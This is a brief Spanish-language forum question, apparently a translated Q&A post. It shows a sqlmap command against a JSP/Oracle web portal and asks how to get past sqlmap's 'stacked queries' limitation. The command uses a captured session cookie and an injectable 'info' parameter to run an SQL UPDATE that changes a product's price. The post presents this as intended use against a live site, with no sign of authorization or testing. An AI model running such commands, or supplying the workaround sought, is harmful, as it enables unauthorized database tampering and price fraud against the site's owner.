voto negativo favorito Estoy tratando de usar el siguiente código
sqlmap -u "http://exp.com/portal/pd.jsp action=edit&info=products&sub_info=price"
--cookie="JSESSIONID....." --dbms Oracle -D PRODUCTS -T PRICE --threads 10
--sql-query="UPDATE PRICE SET PRICE ='100' WHERE PRODUCTID LIKE '7534' AND PRODUCTCODE = '73546'"
Verifiqué este enlace antes y es inyectable en el parámetro de información (ciego basado en Boolean). El resultado de la ejecución del código anterior es:
warning: "execution of custom SQL queries is only available when stacked queries are supported"
¿Hay alguna solución para hacer esto?
Este sitio web se está ejecutando en Apache, JSP y Oracle.